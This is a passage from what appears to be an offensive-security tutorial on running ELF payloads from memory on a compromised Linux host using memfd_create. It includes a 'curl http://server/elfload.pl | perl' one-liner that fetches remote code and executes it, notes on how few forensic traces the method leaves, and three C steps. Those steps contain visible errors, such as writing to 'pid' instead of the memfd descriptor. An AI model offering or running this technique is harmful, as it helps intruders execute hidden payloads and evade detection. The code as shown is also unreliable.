Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink.

If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2).

Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast. asciicast

In C (translate to your non-disk-touching language of choice):

  1. fd = memfd_create("", MFD_CLOEXEC);
  2. write(pid, elfbuffer, elfbuffer_len);
  3. asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL);